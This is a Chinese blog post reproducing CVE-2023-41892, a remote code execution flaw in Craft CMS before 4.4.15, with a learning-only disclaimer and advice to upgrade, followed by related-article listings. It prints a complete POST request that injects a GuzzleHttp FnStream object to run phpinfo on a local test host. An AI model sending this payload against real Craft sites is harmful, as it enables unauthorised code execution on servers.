[漏洞复现] Craft (CVE-2023-41892)

原创 已于 2024-01-17 15:02:11 修改 · 810 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全

于 2024-01-17 15:00:01 首次发布
这篇文章详细描述了CraftCMS4.4.15之前版本存在的代码注入漏洞,通过PHPinfo注入实现远程代码执行。建议用户尽快升级到4.4.15及以上版本以保障网站安全。
部署运行你感兴趣的模型镜像

前言

 本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

一、漏洞情况分析

Craft CMS是美国Pixel&tonic公司的一套内容管理系统(CMS)。一个开源的内容管理系统,它专注于用户友好的内容创建过程,逻辑清晰明了,是一个高度自由,高度自定义设计的平台吗,可以用来创建个人或企业网站也可以搭建企业级电子商务系统。

Pixel&tonic Craft CMS 4.4.15之前版本存在代码注入漏洞,该漏洞源于存在远程代码执行漏洞。

Craft CMS 是一个用于创建数字体验的平台。这是一种高影响力、低复杂性的攻击媒介。建议运行 4.4.15 之前的 Craft 安装的用户至少更新到该版本以缓解该问题。此问题已在 Craft CMS 4.4.15 中修复

二、漏洞复现

POST请求, phpinfo注入命令

POST /index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 238
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream","__construct()": [{"close":null}],"_fn_close":"phpinfo"}}

 后续的构造有点难这里就不演示了。User-Agent头传参防止被编码,第一次请求写入,第二次请求包含。不过第一次传错了,ta就会一直报错。要到第二天才能重新传。

后语

升级版本即可

您可能感兴趣的与本文相关的镜像

Stable-Diffusion-3.5

Stable-Diffusion-3.5

图片生成
Stable-Diffusion

Stable Diffusion 3.5 (SD 3.5) 是由 Stability AI 推出的新一代文本到图像生成模型,相比 3.0 版本,它提升了图像质量、运行速度和硬件效率

CraftCMS ConditionsController.php 代码执行漏洞CVE-2023-41892
0xSec
05-31 1295
CraftCMS在4.4.15版本之前存在远程代码执行漏洞,攻击者可构造恶意请求执行任意代码,控制服务器。
Craft CMS 模板注入导致 Rce漏洞复现(CVE-2024-56145)(附脚本)
iSee857的博客
12-23 763
由于模板路径的输入验证缺失,导致未授权用户可以注入恶意路径并加载执行任意代码。攻击者利用 Craft CMS 的模板加载机制,通过伪造路径将恶意代码注入到系统的模板解析器中。​​​​​​​一旦注入成功,攻击者即可通过反弹 Shell 或其他方式在目标服务器上执行任意代码,达到完全控制目标的目的
漏洞复现-Craft CMS 远程代码执行漏洞 (CVE-2023-41892)
玄道的网安博客
08-12 668
在 4.4.15 之前的版本中,存在一个远程代码执行漏洞Craft CMS 是一个用于创建数字体验的平台,这是一个高影响、低复杂性的攻击向量。受影响的 Craft CMS 版本存在代码注入漏洞,该漏洞源于远程代码执行漏洞。为了缓解此问题,建议运行 4.4.15 之前版本的用户至少更新到 4.4.15 版本。漏洞严重性CVSS 3.x 严重性和指标:NIST: NVD向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H。将as和on特殊字符过滤了。
CVE-2023-41892 漏洞复现
Jay17的博客
02-14 3034
CVE-2023-41892 漏洞复现
Craft CMS远程代码执行漏洞CVE-2023-41892
swordheart的博客
05-17 253
Craft CMS是一款流行的内容管理系统,广泛应用于网站开发中。CVE-2023-41892是一个影响Craft CMS的远程代码执行(RCE)漏洞。该漏洞的存在使得攻击者能够通过精心构造的请求在目标服务器上执行任意代码,从而可能导致服务器被完全控制。
漏洞复现craft cms 远程代码执行漏洞CVE-2023-41892
rm -rf *
10-18 2514
Pixel&tonic Craft CMS 4.4.15之前版本存在代码注入漏洞,该漏洞源于存在远程代码执行漏洞
(0day)CraftCms 代码注入漏洞复现CVE-2025-32432)(附脚本)
iSee857的博客
04-27 1073
攻击者可构造恶意请求利用generate-transform端点触发反序列化,执行任意代码控制服务器,未经身份验证的攻击者可以通过该漏洞在目标服务器上注入恶意代码,最终获取服务器权限。(CVE-2025-32432)
Craft CMS generate-transform接口存在远程命令执行漏洞CVE-2025-32432 附POC
nnn2188185的博客
05-06 345
微信公众号搜索:南风漏洞复现文库该文章 南风漏洞复现文库 公众号首发Craft CMS。
Craft CMS 远程代码执行漏洞(含批量验证poc)
weixin_43567873的博客
04-18 470
Craft CMS 远程代码执行漏洞(含批量验证poc)
HTB | Surveillance CVE-2023-41892 CVE-2023-26035
q
12-24 1209
BusyBox 包含了一些简单的工具,例如ls、cat和echo等等,还包含了一些更大、更复杂的工具,例grep、find、mount以及telnet。在/var/www/html/craft/storage/backups中发现一个sql的压缩包,使用python开启http服务,访问并下载文件。使用hash-identifier识别hash属性,识别出来为SHA-256,Haval-256。使用sudo执行shell脚本 pass中的密码是上文linpeas找到的。1888吉利数保存一下。
Goby 漏洞安全通告| Craft CMS /index.php 代码执行漏洞CVE-2025-32432)
m0_46699477的博客
04-27 677
CVE-2025-32432:Craft CMS从 3.0.0-RC1 版本到 3.9.15 之前的版本、4.0.0-RC1 版本到 4.14.15 之前的版本以及 5.0.0-RC1 版本到 5.6.17 之前的版本都存在远程代码执行漏洞,攻击者可通过特定的POST请求在未经身份验证的情况下执行任意代码,获取服务器权限。
【亲测免费】 Craft CMS:强大的开源内容管理系统
gitblog_00434的博客
12-25 546
Craft CMS:强大的开源内容管理系统 Craft CMS 是一个灵活且用户友好的内容管理系统(CMS),它允许开发者创建定制化的数字体验。它是一个基于 PHP 开发的自托管应用,后端使用 MySQL 或 Postgres 数据库。以下是对这个项目的详细介绍。 1. 项目基础介绍及主要编程语言 Craft CMS 的主要编程语言是 PHP,同时它使用了Twig模板引擎来简化页面模板的编写。这个...
hackthebox Surveillance
EdSu12138的博客
04-06 812
Cors全称"跨域资源共享"(Cross-origin resource sharing),Cors的出现是用来弥补SOP(同源策略)的不足。在当时SOP有些限制了网页的业务需求,不能够使不同域的网页互相访问,因此提出了Cors:用于绕过SOP(同源策略)来实现跨域资源访问的一种技术。Cors漏洞就是攻击者利用Cors技术来获取用户的敏感数据,从而导致用户敏感信息泄露。首先题目肯定不涉及跨域 这个靶机属于那种中等偏简单的 不会涉及跨域所以 直接百度一下这个cms带版本号 找到。
【亲测免费】 Craft CMS 项目推荐
gitblog_00209的博客
11-22 487
Craft CMS 项目推荐 项目基础介绍和主要编程语言 Craft CMS 是一个灵活且用户友好的内容管理系统(CMS),专为创建定制的数字体验而设计。该项目主要使用 PHP 语言开发,同时结合了 JavaScript、Twig、SCSS、Vue 和 TypeScript 等多种技术,以提供丰富的功能和良好的用户体验。 项目核心功能 Craft CMS 的核心功能包括: 直观的控制面板:提供用...
探索优雅的内容管理系统:Craft CMS
gitblog_00078的博客
05-11 620
探索优雅的内容管理系统:Craft CMS Craft CMS 是一款创新的、用户友好的内容管理系统,专为打造定制化数字体验而设计,无论是在网页上还是更广阔的互联网领域。它的强大功能和灵活性使其在众多CMS中脱颖而出。 项目介绍 Craft CMS 的核心亮点在于其直观的控制面板,让内容创建和管理变得轻松简单。它允许您自由地定义您的内容模型,不受任何预设限制。此外,Craft 还采用基于 Twig...
探索Craft CMS:构建现代网站的强大工具链
gitblog_00022的博客
04-17 667
探索Craft CMS:构建现代网站的强大工具链 的项目,它是一个精选的资源列表,涵盖了插件、主题、教程及社区资源,帮助用户更好地利用Craft CMS进行网站开发。 技术分析 Craft CMS的核心特点是其先进的模板引擎和强大的插件系统。它采用Twig作为模板语言,允许开发者创建清晰、简洁且可维护的HTML代码。Craft还支持动态配置字段,使得内容管理更加灵活,可以根据项目的具体需求定制数据...
使用 Craft CMS 搭建blog模型
weixin_30550271的博客
07-18 488
原文链接:http://www.supperxin.com/Coding/Details/create-blog-using-craft-cms Craft CMS站点的搭建可以参考这篇:使用Docker镜像服务来搭建 craft cms 站点 Template功能简介 使用Template,可以自定义网站的呈现样式。 Template的保存位置在:craft/templates,可以在此目录下任...
Craft CMS 开源项目教程
gitblog_00981的博客
08-16 906
Craft CMS 开源项目教程 项目介绍 Craft CMS 是一个灵活且用户友好的内容管理系统(CMS),它允许开发者构建高度定制的网站和应用程序。Craft 以其强大的内容管理功能和优雅的界面设计而闻名,适用于各种规模的项目。 项目快速启动 环境要求 PHP 7.2.5 或更高版本 MySQL 5.5 或更高版本,或者 PostgreSQL 9.5 或更高版本 Composer 安装步骤...
Craft CMS远程代码执行漏洞(CVE-2025-32432)技术分析与利用指南
最新发布
分享技术点滴
07-17 226
更新到3.9.15/4.14.15/5.6.17 || 严重(10.0) |更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)请始终在受控环境或获得适当授权的情况下进行负责任的测试。| 远程、无需认证 |未经系统所有者明确许可,任何利用或滥用漏洞的行为都是。| 完全远程代码执行 |任何未经授权的访问或违反法律或服务条款的活动。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值